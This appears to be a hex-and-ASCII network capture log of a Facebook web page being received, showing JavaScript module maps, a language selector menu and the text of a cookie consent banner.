                                                                                                                                  2022-10-17 20:07:01 UTC276INData Raw: 54 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 53 57 78 33 79 4e 76 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 57 5c 2f 72 5c 2f 4f 5f 53 6a 64 63 52 2d 78 4b 4c 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 78 32 32 4f 62 79 34 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 30 5c 2f 72 5c 2f 66 4e 33 63 43 6a 37 49 6c 34 44 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b
                                                                                                                                  Data Ascii: T.js?_nc_x=Ij3Wp8lg5Kz"},"SWx3yNv":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yW\/r\/O_SjdcR-xKL.js?_nc_x=Ij3Wp8lg5Kz"},"x22Oby4":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/y0\/r\/fN3cCj7Il4D.js?_nc_x=Ij3Wp8lg5K
                                                                                                                                  2022-10-17 20:07:01 UTC277INData Raw: 75 22 5d 2c 22 62 65 22 3a 31 7d 2c 22 46 6f 72 6d 22 3a 7b 22 72 22 3a 5b 22 76 63 42 63 4a 6a 77 22 2c 22 5a 32 47 6a 56 75 39 22 2c 22 76 47 74 32 6d 78 7a 22 2c 22 68 79 4b 6d 70 75 75 22 5d 2c 22 62 65 22 3a 31 7d 2c 22 46 6f 72 6d 53 75 62 6d 69 74 22 3a 7b 22 72 22 3a 5b 22 76 63 42 63 4a 6a 77 22 2c 22 45 46 31 68 57 6c 35 22 2c 22 5a 32 47 6a 56 75 39 22 2c 22 6e 36 57 34 78 4d 48 22 2c 22 76 47 74 32 6d 78 7a 22 2c 22 72 68 32 4a 47 30 55 22 2c 22 68 79 4b 6d 70 75 75 22 5d 2c 22 72 64 73 22 3a 7b 22 6d 22 3a 5b 22 46 62 74 4c 6f 67 67 69 6e 67 22 2c 22 49 6e 74 6c 51 74 45 76 65 6e 74 46 61 6c 63 6f 45 76 65 6e 74 22 2c 22 42 61 6e 7a 61 69 53 63 75 62 61 5f 44 45 50 52 45 43 41 54 45 44 22 5d 2c 22 72 22 3a 5b 22 2b 52 47 74 4d 30 6f 22 2c 22
                                                                                                                                  Data Ascii: u"],"be":1},"Form":{"r":["vcBcJjw","Z2GjVu9","vGt2mxz","hyKmpuu"],"be":1},"FormSubmit":{"r":["vcBcJjw","EF1hWl5","Z2GjVu9","n6W4xMH","vGt2mxz","rh2JG0U","hyKmpuu"],"rds":{"m":["FbtLogging","IntlQtEventFalcoEvent","BanzaiScuba_DEPRECATED"],"r":["+RGtM0o","
                                                                                                                                  2022-10-17 20:07:01 UTC279INData Raw: 22 2c 22 5a 32 47 6a 56 75 39 22 2c 22 68 79 4b 6d 70 75 75 22 2c 22 6f 5c 2f 75 6e 79 72 6e 22 2c 22 65 4d 6b 4d 78 48 5a 22 2c 22 69 57 64 61 75 6b 34 22 2c 22 52 6c 36 30 35 48 31 22 2c 22 75 66 4f 6c 34 6a 48 22 2c 22 67 33 56 46 45 50 4a 22 2c 22 68 6a 58 56 7a 4e 55 22 2c 22 78 4d 44 30 34 37 63 22 2c 22 74 65 32 36 30 4c 65 22 2c 22 74 4e 42 6e 52 74 76 22 2c 22 36 64 48 34 43 4a 53 22 2c 22 39 79 6f 4e 79 58 58 22 2c 22 4c 70 33 36 59 58 54 22 2c 22 32 47 70 61 6b 5c 2f 31 22 2c 22 43 47 6b 48 34 46 59 22 2c 22 4b 68 62 44 71 4c 6d 22 2c 22 69 46 75 50 62 57 68 22 2c 22 51 6b 6e 33 7a 4d 45 22 2c 22 47 70 51 46 42 77 4c 22 2c 22 48 34 77 61 63 32 4e 22 2c 22 6c 57 4f 76 47 54 61 22 2c 22 78 4e 55 41 4f 72 46 22 2c 22 51 4d 54 46 61 33 6c 22 2c 22
                                                                                                                                  Data Ascii: ","Z2GjVu9","hyKmpuu","o\/unyrn","eMkMxHZ","iWdauk4","Rl605H1","ufOl4jH","g3VFEPJ","hjXVzNU","xMD047c","te260Le","tNBnRtv","6dH4CJS","9yoNyXX","Lp36YXT","2Gpak\/1","CGkH4FY","KhbDqLm","iFuPbWh","Qkn3zME","GpQFBwL","H4wac2N","lWOvGTa","xNUAOrF","QMTFa3l","
                                                                                                                                  2022-10-17 20:07:01 UTC280INData Raw: 5f 44 45 50 52 45 43 41 54 45 44 22 2c 22 50 61 67 65 54 72 61 6e 73 69 74 69 6f 6e 73 22 2c 22 41 6e 69 6d 61 74 69 6f 6e 22 5d 7d 2c 22 62 65 22 3a 31 7d 2c 22 50 68 6f 74 6f 54 61 67 73 22 3a 7b 22 72 22 3a 5b 22 76 63 42 63 4a 6a 77 22 2c 22 74 6a 6d 6b 2b 30 4b 22 2c 22 2b 52 47 74 4d 30 6f 22 2c 22 78 4d 44 30 34 37 63 22 2c 22 76 47 74 32 6d 78 7a 22 2c 22 68 79 4b 6d 70 75 75 22 5d 2c 22 62 65 22 3a 31 7d 2c 22 54 61 67 54 6f 6b 65 6e 69 7a 65 72 22 3a 7b 22 72 22 3a 5b 22 76 63 42 63 4a 6a 77 22 2c 22 74 6a 6d 6b 2b 30 4b 22 2c 22 38 34 31 43 72 56 36 22 2c 22 71 4b 4a 59 6f 61 44 22 2c 22 2b 52 47 74 4d 30 6f 22 2c 22 50 4d 45 73 5c 2f 6f 79 22 2c 22 5a 32 47 6a 56 75 39 22 2c 22 68 79 4b 6d 70 75 75 22 2c 22 43 71 52 43 4a 4b 6c 22 2c 22 78 33
                                                                                                                                  Data Ascii: _DEPRECATED","PageTransitions","Animation"]},"be":1},"PhotoTags":{"r":["vcBcJjw","tjmk+0K","+RGtM0o","xMD047c","vGt2mxz","hyKmpuu"],"be":1},"TagTokenizer":{"r":["vcBcJjw","tjmk+0K","841CrV6","qKJYoaD","+RGtM0o","PMEs\/oy","Z2GjVu9","hyKmpuu","CqRCJKl","x3
                                                                                                                                  2022-10-17 20:07:01 UTC282INData Raw: 64 73 22 3a 7b 22 6d 22 3a 5b 22 42 61 6e 7a 61 69 53 63 75 62 61 5f 44 45 50 52 45 43 41 54 45 44 22 5d 7d 2c 22 62 65 22 3a 31 7d 2c 22 44 69 61 6c 6f 67 22 3a 7b 22 72 22 3a 5b 22 76 63 42 63 4a 6a 77 22 2c 22 45 46 31 68 57 6c 35 22 2c 22 2b 52 47 74 4d 30 6f 22 2c 22 58 39 6e 72 36 35 61 22 2c 22 52 70 4d 75 38 48 64 22 2c 22 50 4d 45 73 5c 2f 6f 79 22 2c 22 5a 32 47 6a 56 75 39 22 2c 22 68 79 4b 6d 70 75 75 22 2c 22 39 79 6f 4e 79 58 58 22 2c 22 6c 57 4f 76 47 54 61 22 2c 22 6e 36 57 34 78 4d 48 22 2c 22 6a 54 58 64 48 33 65 22 2c 22 76 47 74 32 6d 78 7a 22 2c 22 4d 49 53 44 50 42 4e 22 2c 22 52 35 77 31 72 43 4a 22 2c 22 5a 45 43 34 52 72 51 22 2c 22 65 39 41 4e 7a 77 5c 2f 22 2c 22 41 39 63 69 56 42 39 22 2c 22 6f 5c 2f 75 6e 79 72 6e 22 2c 22 65
                                                                                                                                  Data Ascii: ds":{"m":["BanzaiScuba_DEPRECATED"]},"be":1},"Dialog":{"r":["vcBcJjw","EF1hWl5","+RGtM0o","X9nr65a","RpMu8Hd","PMEs\/oy","Z2GjVu9","hyKmpuu","9yoNyXX","lWOvGTa","n6W4xMH","jTXdH3e","vGt2mxz","MISDPBN","R5w1rCJ","ZEC4RrQ","e9ANzw\/","A9ciVB9","o\/unyrn","e
                                                                                                                                  2022-10-17 20:07:01 UTC283INData Raw: 77 54 35 51 78 77 22 2c 22 52 4d 34 4d 52 34 6e 22 2c 22 50 4d 45 73 5c 2f 6f 79 22 2c 22 4b 41 6a 62 72 6c 5c 2f 22 2c 22 68 79 4b 6d 70 75 75 22 2c 22 6f 5c 2f 75 6e 79 72 6e 22 2c 22 4c 70 33 36 59 58 54 22 2c 22 69 46 75 50 62 57 68 22 2c 22 6c 57 4f 76 47 54 61 22 2c 22 6e 36 57 34 78 4d 48 22 2c 22 6a 54 58 64 48 33 65 22 2c 22 76 47 74 32 6d 78 7a 22 2c 22 75 64 69 74 64 6f 71 22 2c 22 59 76 33 35 4f 66 32 22 2c 22 63 59 55 33 63 33 32 22 2c 22 6f 77 65 73 41 33 50 22 5d 2c 22 72 64 73 22 3a 7b 22 6d 22 3a 5b 22 46 62 74 4c 6f 67 67 69 6e 67 22 2c 22 49 6e 74 6c 51 74 45 76 65 6e 74 46 61 6c 63 6f 45 76 65 6e 74 22 5d 2c 22 72 22 3a 5b 22 2b 52 47 74 4d 30 6f 22 5d 7d 2c 22 62 65 22 3a 31 7d 2c 22 58 55 49 44 69 61 6c 6f 67 42 6f 64 79 2e 72 65 61
                                                                                                                                  Data Ascii: wT5Qxw","RM4MR4n","PMEs\/oy","KAjbrl\/","hyKmpuu","o\/unyrn","Lp36YXT","iFuPbWh","lWOvGTa","n6W4xMH","jTXdH3e","vGt2mxz","uditdoq","Yv35Of2","cYU3c32","owesA3P"],"rds":{"m":["FbtLogging","IntlQtEventFalcoEvent"],"r":["+RGtM0o"]},"be":1},"XUIDialogBody.rea
                                                                                                                                  2022-10-17 20:07:01 UTC285INData Raw: 58 39 6e 72 36 35 61 22 2c 22 50 4d 45 73 5c 2f 6f 79 22 2c 22 65 4d 6b 4d 78 48 5a 22 2c 22 39 79 6f 4e 79 58 58 22 2c 22 51 4d 54 46 61 33 6c 22 2c 22 59 76 33 35 4f 66 32 22 2c 22 55 66 71 36 59 57 58 22 2c 22 52 35 77 31 72 43 4a 22 2c 22 6f 5c 2f 75 6e 79 72 6e 22 2c 22 50 30 67 55 4c 47 6f 22 2c 22 43 47 6b 48 34 46 59 22 2c 22 65 39 41 4e 7a 77 5c 2f 22 2c 22 6f 77 65 73 41 33 50 22 2c 22 52 4d 34 4d 52 34 6e 22 2c 22 41 70 47 35 56 4b 34 22 2c 22 50 5c 2f 6d 72 35 56 45 22 2c 22 5a 38 7a 36 59 6f 30 22 2c 22 63 68 58 77 50 72 55 22 5d 29 3b 7d 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 3e 72 65 71 75 69 72 65 4c 61 7a 79 28 5b 22 54 69 6d 65 53 6c 69 63 65 49 6d 70 6c 22 2c 22 53 65 72 76 65 72 4a 53 22 5d 2c 66 75 6e 63 74 69 6f 6e
                                                                                                                                  Data Ascii: X9nr65a","PMEs\/oy","eMkMxHZ","9yoNyXX","QMTFa3l","Yv35Of2","Ufq6YWX","R5w1rCJ","o\/unyrn","P0gULGo","CGkH4FY","e9ANzw\/","owesA3P","RM4MR4n","ApG5VK4","P\/mr5VE","Z8z6Yo0","chXwPrU"]);});</script><script>requireLazy(["TimeSliceImpl","ServerJS"],function
                                                                                                                                  2022-10-17 20:07:01 UTC285INData Raw: 31 61 65 66 0d 0a 6d 6c 36 56 48 71 4f 4f 44 4f 55 45 69 6d 46 42 43 47 55 56 6e 6e 37 65 5a 34 74 35 78 50 5f 45 33 46 44 36 63 32 61 6f 45 6b 64 31 41 32 34 52 34 4b 31 70 62 39 62 74 35 70 7a 41 75 51 43 47 67 70 37 35 4f 67 75 63 35 31 45 33 77 5f 68 37 70 4e 4c 5f 59 6d 31 59 43 37 68 74 52 6e 6f 45 57 71 4b 4b 62 4a 63 46 4f 4f 33 6c 77 55 49 5a 6f 56 77 71 68 45 31 61 44 46 37 30 52 6d 6b 66 41 4b 6a 41 34 55 55 51 22 2c 22 75 6e 74 72 75 73 74 65 64 5f 6c 69 6e 6b 5f 64 65 66 61 75 6c 74 5f 68 61 73 68 22 3a 22 41 54 33 5a 45 49 6a 36 33 42 4b 4e 36 62 50 62 77 43 50 4d 34 39 4e 4c 57 4a 39 35 39 76 58 41 55 66 59 58 59 5a 66 57 44 4f 37 6c 68 79 55 59 59 6b 71 4b 2d 2d 59 7a 70 62 53 31 76 39 6e 4b 58 57 30 30 4c 73 6e 70 59 70 78 44 58 66 43 59
                                                                                                                                  Data Ascii: 1aefml6VHqOODOUEimFBCGUVnn7eZ4t5xP_E3FD6c2aoEkd1A24R4K1pb9bt5pzAuQCGgp75Oguc51E3w_h7pNL_Ym1YC7htRnoEWqKKbJcFOO3lwUIZoVwqhE1aDF70RmkfAKjA4UUQ","untrusted_link_default_hash":"AT3ZEIj63BKN6bPbwCPM49NLWJ959vXAUfYXYZfWDO7lhyUYYkqK--YzpbS1v9nKXW00LsnpYpxDXfCY
                                                                                                                                  2022-10-17 20:07:01 UTC287INData Raw: 30 37 39 5f 30 5f 68 5f 45 54 22 2c 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 69 5f 65 63 22 2c 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 6a 5f 7a 6e 22 2c 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 6b 5f 4c 39 22 2c 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 6c 5f 4c 34 22 2c 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 6d 5f 66 61 22 2c 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 6e 5f 31 62 22 2c 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 6f 5f 51 77 22 2c 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 70 5f 70 36 22 2c 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 71 5f 76 68 22 2c
                                                                                                                                  Data Ascii: 079_0_h_ET","__markup_3310c079_0_i_ec","__markup_3310c079_0_j_zn","__markup_3310c079_0_k_L9","__markup_3310c079_0_l_L4","__markup_3310c079_0_m_fa","__markup_3310c079_0_n_1b","__markup_3310c079_0_o_Qw","__markup_3310c079_0_p_p6","__markup_3310c079_0_q_vh",
                                                                                                                                  2022-10-17 20:07:01 UTC288INData Raw: 7b 22 5f 5f 6d 22 3a 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 35 5f 6b 78 22 7d 2c 22 6c 61 62 65 6c 22 3a 22 45 73 70 61 5c 75 30 30 66 31 6f 6c 22 2c 22 74 69 74 6c 65 22 3a 22 22 2c 22 63 6c 61 73 73 4e 61 6d 65 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 7d 2c 7b 22 63 6c 61 73 73 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 2c 22 76 61 6c 75 65 22 3a 22 65 73 5f 45 53 22 2c 22 73 65 6c 65 63 74 65 64 22 3a 66 61 6c 73 65 2c 22 63 74 6f 72 22 3a 7b 22 5f 5f 6d 22 3a 22 4d 65 6e 75 53 65 6c 65 63 74 61 62 6c 65 49 74 65 6d 22 7d 2c 22 6d 61 72 6b 75 70 22 3a 7b 22 5f 5f 6d 22 3a 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 36 5f 77 6e 22 7d 2c 22 6c 61 62 65 6c 22 3a 22 45 73 70 61 5c 75 30 30 66 31 6f 6c 20 28 45 73
                                                                                                                                  Data Ascii: {"__m":"__markup_3310c079_0_5_kx"},"label":"Espa\u00f1ol","title":"","className":"headerItem"},{"class":"headerItem","value":"es_ES","selected":false,"ctor":{"__m":"MenuSelectableItem"},"markup":{"__m":"__markup_3310c079_0_6_wn"},"label":"Espa\u00f1ol (Es
                                                                                                                                  2022-10-17 20:07:01 UTC290INData Raw: 65 22 3a 22 70 74 5f 42 52 22 2c 22 73 65 6c 65 63 74 65 64 22 3a 66 61 6c 73 65 2c 22 63 74 6f 72 22 3a 7b 22 5f 5f 6d 22 3a 22 4d 65 6e 75 53 65 6c 65 63 74 61 62 6c 65 49 74 65 6d 22 7d 2c 22 6d 61 72 6b 75 70 22 3a 7b 22 5f 5f 6d 22 3a 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 64 5f 72 4f 22 7d 2c 22 6c 61 62 65 6c 22 3a 22 50 6f 72 74 75 67 75 5c 75 30 30 65 61 73 20 28 42 72 61 73 69 6c 29 22 2c 22 74 69 74 6c 65 22 3a 22 22 2c 22 63 6c 61 73 73 4e 61 6d 65 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 7d 2c 7b 22 63 6c 61 73 73 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 2c 22 76 61 6c 75 65 22 3a 22 70 74 5f 50 54 22 2c 22 73 65 6c 65 63 74 65 64 22 3a 66 61 6c 73 65 2c 22 63 74 6f 72 22 3a 7b 22 5f 5f 6d 22 3a 22 4d 65 6e 75 53 65
                                                                                                                                  Data Ascii: e":"pt_BR","selected":false,"ctor":{"__m":"MenuSelectableItem"},"markup":{"__m":"__markup_3310c079_0_d_rO"},"label":"Portugu\u00eas (Brasil)","title":"","className":"headerItem"},{"class":"headerItem","value":"pt_PT","selected":false,"ctor":{"__m":"MenuSe
                                                                                                                                  2022-10-17 20:07:01 UTC291INData Raw: 2c 22 6c 61 62 65 6c 22 3a 22 5c 75 30 31 30 63 65 5c 75 30 31 36 31 74 69 6e 61 22 2c 22 74 69 74 6c 65 22 3a 22 22 2c 22 63 6c 61 73 73 4e 61 6d 65 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 7d 2c 7b 22 63 6c 61 73 73 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 2c 22 76 61 6c 75 65 22 3a 22 65 6c 5f 47 52 22 2c 22 73 65 6c 65 63 74 65 64 22 3a 66 61 6c 73 65 2c 22 63 74 6f 72 22 3a 7b 22 5f 5f 6d 22 3a 22 4d 65 6e 75 53 65 6c 65 63 74 61 62 6c 65 49 74 65 6d 22 7d 2c 22 6d 61 72 6b 75 70 22 3a 7b 22 5f 5f 6d 22 3a 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 6c 5f 4c 34 22 7d 2c 22 6c 61 62 65 6c 22 3a 22 5c 75 30 33 39 35 5c 75 30 33 62 62 5c 75 30 33 62 62 5c 75 30 33 62 37 5c 75 30 33 62 64 5c 75 30 33 62 39 5c 75 30 33 62 61 5c 75 30
                                                                                                                                  Data Ascii: ,"label":"\u010ce\u0161tina","title":"","className":"headerItem"},{"class":"headerItem","value":"el_GR","selected":false,"ctor":{"__m":"MenuSelectableItem"},"markup":{"__m":"__markup_3310c079_0_l_L4"},"label":"\u0395\u03bb\u03bb\u03b7\u03bd\u03b9\u03ba\u0
                                                                                                                                  2022-10-17 20:07:01 UTC293INData Raw: 22 7d 2c 22 6d 61 72 6b 75 70 22 3a 7b 22 5f 5f 6d 22 3a 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 72 5f 42 58 22 7d 2c 22 6c 61 62 65 6c 22 3a 22 5c 75 34 65 32 64 5c 75 36 35 38 37 28 5c 75 35 33 66 30 5c 75 37 30 36 33 29 22 2c 22 74 69 74 6c 65 22 3a 22 22 2c 22 63 6c 61 73 73 4e 61 6d 65 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 7d 2c 7b 22 63 6c 61 73 73 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 2c 22 76 61 6c 75 65 22 3a 22 7a 68 5f 43 4e 22 2c 22 73 65 6c 65 63 74 65 64 22 3a 66 61 6c 73 65 2c 22 63 74 6f 72 22 3a 7b 22 5f 5f 6d 22 3a 22 4d 65 6e 75 53 65 6c 65 63 74 61 62 6c 65 49 74 65 6d 22 7d 2c 22 6d 61 72 6b 75 70 22 3a 7b 22 5f 5f 6d 22 3a 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 73 5f 51 51 22 7d
                                                                                                                                  Data Ascii: "},"markup":{"__m":"__markup_3310c079_0_r_BX"},"label":"\u4e2d\u6587(\u53f0\u7063)","title":"","className":"headerItem"},{"class":"headerItem","value":"zh_CN","selected":false,"ctor":{"__m":"MenuSelectableItem"},"markup":{"__m":"__markup_3310c079_0_s_QQ"}
                                                                                                                                  2022-10-17 20:07:01 UTC294INData Raw: 44 69 61 6c 6f 67 48 69 64 65 4f 6e 53 75 63 63 65 73 73 22 7d 2c 7b 22 5f 5f 6d 22 3a 22 4c 61 79 65 72 48 69 64 65 4f 6e 54 72 61 6e 73 69 74 69 6f 6e 22 7d 2c 7b 22 5f 5f 6d 22 3a 22 4c 61 79 65 72 52 65 6d 6f 76 65 4f 6e 48 69 64 65 22 7d 5d 2c 22 61 74 74 72 69 62 75 74 65 73 22 3a 7b 22 64 61 74 61 2d 74 65 73 74 69 64 22 3a 22 63 6f 6f 6b 69 65 2d 70 6f 6c 69 63 79 2d 6d 61 6e 61 67 65 2d 64 69 61 6c 6f 67 22 7d 2c 22 63 6c 61 73 73 4e 61 6d 65 73 22 3a 5b 22 5f 39 6f 2d 77 22 5d 7d 2c 7b 22 5f 5f 6d 22 3a 22 5f 5f 6d 61 72 6b 75 70 5f 39 66 35 66 61 63 31 35 5f 30 5f 30 5f 42 47 22 7d 5d 2c 32 5d 2c 5b 22 5f 5f 69 6e 73 74 5f 65 35 61 64 32 34 33 64 5f 30 5f 30 5f 73 4e 22 2c 5b 22 50 6f 70 6f 76 65 72 4d 65 6e 75 22 2c 22 5f 5f 69 6e 73 74 5f 31
                                                                                                                                  Data Ascii: DialogHideOnSuccess"},{"__m":"LayerHideOnTransition"},{"__m":"LayerRemoveOnHide"}],"attributes":{"data-testid":"cookie-policy-manage-dialog"},"classNames":["_9o-w"]},{"__m":"__markup_9f5fac15_0_0_BG"}],2],["__inst_e5ad243d_0_0_sN",["PopoverMenu","__inst_1
                                                                                                                                  2022-10-17 20:07:01 UTC295INData Raw: 5c 75 30 30 33 43 5c 2f 73 70 61 6e 3e 5c 75 30 30 33 43 5c 2f 61 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 64 69 76 20 69 64 3d 5c 22 63 6f 6f 6b 69 65 5f 62 61 6e 6e 65 72 5f 74 69 74 6c 65 5c 22 20 63 6c 61 73 73 3d 5c 22 5f 39 6f 2d 64 5c 22 3e 5c 75 30 30 33 43 64 69 76 20 69 64 3d 5c 22 63 6f 6e 73 65 6e 74 5f 63 6f 6f 6b 69 65 73 5f 74 69 74 6c 65 5c 22 3e 41 6c 6c 6f 77 20 74 68 65 20 75 73 65 20 6f 66 20 63 6f 6f 6b 69 65 73 20 66 72 6f 6d 20 46 61 63 65 62 6f 6f 6b 20 6f 6e 20 74 68 69 73 20 62 72 6f 77 73 65 72 3f 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 6f 2d 67 5c 22
                                                                                                                                  Data Ascii: \u003C\/span>\u003C\/a>\u003C\/div>\u003C\/div>\u003Cdiv id=\"cookie_banner_title\" class=\"_9o-d\">\u003Cdiv id=\"consent_cookies_title\">Allow the use of cookies from Facebook on this browser?\u003C\/div>\u003C\/div>\u003C\/div>\u003Cdiv class=\"_9o-g\"
                                                                                                                                  2022-10-17 20:07:01 UTC297INData Raw: 20 6f 75 72 20 5c 75 30 30 33 43 61 20 68 72 65 66 3d 5c 22 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 70 6f 6c 69 63 69 65 73 5c 2f 63 6f 6f 6b 69 65 73 5c 2f 5c 22 20 74 61 72 67 65 74 3d 5c 22 5f 62 6c 61 6e 6b 5c 22 20 63 6c 61 73 73 3d 5c 22 5f 39 6f 2d 76 5c 22 20 69 64 3d 5c 22 63 70 6e 2d 70 76 2d 6c 69 6e 6b 5c 22 3e 43 6f 6f 6b 69 65 20 50 6f 6c 69 63 79 5c 75 30 30 33 43 5c 2f 61 3e 2e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 64 69 76 3e 5c 75 30 30 33 43 64 69 76 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 78 70 76 5c 22 3e 5c 75 30 30 33 43 64 69 76 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 78 70 77 5c 22 3e 45 73
                                                                                                                                  Data Ascii: our \u003Ca href=\"https:\/\/www.facebook.com\/policies\/cookies\/\" target=\"_blank\" class=\"_9o-v\" id=\"cpn-pv-link\">Cookie Policy\u003C\/a>.\u003C\/div>\u003C\/div>\u003Cdiv>\u003Cdiv>\u003Cdiv class=\"_9xpv\">\u003Cdiv>\u003Cdiv class=\"_9xpw\">Es
                                                                                                                                  2022-10-17 20:07:01 UTC298INData Raw: 20 63 6c 61 73 73 3d 5c 22 70 61 6d 20 5f 39 6f 2d 6e 20 75 69 42 6f 78 47 72 61 79 5c 22 3e 5c 75 30 30 33 43 70 20 63 6c 61 73 73 3d 5c 22 5f 39 6f 2d 6f 5c 22 3e 49 66 20 79 6f 75 20 61 6c 6c 6f 77 20 74 68 65 73 65 20 63 6f 6f 6b 69 65 73 3a 5c 75 30 30 33 43 5c 2f 70 3e 5c 75 30 30 33 43 70 20 63 6c 61 73 73 3d 5c 22 5f 39 6f 2d 70 5c 22 3e 5c 75 30 30 33 43 75 6c 20 63 6c 61 73 73 3d 5c 22 5f 39 78 70 5f 5c 22 3e 5c 75 30 30 33 43 6c 69 20 63 6c 61 73 73 3d 5c 22 5f 39 78 71 30 5c 22 3e 57 65 5c 75 32 30 31 39 6c 6c 20 62 65 20 61 62 6c 65 20 74 6f 20 62 65 74 74 65 72 20 70 65 72 73 6f 6e 61 6c 69 7a 65 20 61 64 73 20 66 6f 72 20 79 6f 75 20 6f 66 66 20 6f 66 20 46 61 63 65 62 6f 6f 6b 20 50 72 6f 64 75 63 74 73 2c 20 61 6e 64 20 6d 65 61 73 75 72
                                                                                                                                  Data Ascii: class=\"pam _9o-n uiBoxGray\">\u003Cp class=\"_9o-o\">If you allow these cookies:\u003C\/p>\u003Cp class=\"_9o-p\">\u003Cul class=\"_9xp_\">\u003Cli class=\"_9xq0\">We\u2019ll be able to better personalize ads for you off of Facebook Products, and measur
                                                                                                                                  2022-10-17 20:07:01 UTC300INData Raw: 38 5c 22 3e 5c 75 30 30 33 43 5c 2f 69 3e 5c 75 30 30 33 43 5c 2f 73 70 61 6e 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 62 75 74 74 6f 6e 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 6e 67 62 20 5f 39 6e 67 61 5c 22 3e 5c 75 30 30 33 43 64 69 76 3e 5c 75 30 30 33 43 70 20 63 6c 61 73 73 3d 5c 22 5f 39 6f 2d 6d 5c 22 3e 49 66 20 79 6f 75 20 68 61 76 65 20 61 20 46 61 63 65 62 6f 6f 6b 20 61 63 63 6f 75 6e 74 2c 20 79 6f 75 20 63 61 6e 20 6d 61 6e 61 67 65 20 68 6f 77 20 64 69 66 66 65 72 65 6e 74 20 64 61 74 61 20 69 73 20 75 73 65 64 20 74 6f 20 70 65 72 73 6f 6e 61 6c 69 7a 65 20 61 64 73 20 77 69 74 68 20 74 68 65 73 65 20 74 6f 6f 6c 73 2e 5c 75 30 30 33 43 5c 2f 70 3e 5c 75 30 30 33 43 70 20 63 6c 61 73 73 3d 5c
                                                                                                                                  Data Ascii: 8\">\u003C\/i>\u003C\/span>\u003C\/div>\u003C\/button>\u003Cdiv class=\"_9ngb _9nga\">\u003Cdiv>\u003Cp class=\"_9o-m\">If you have a Facebook account, you can manage how different data is used to personalize ads with these tools.\u003C\/p>\u003Cp class=\
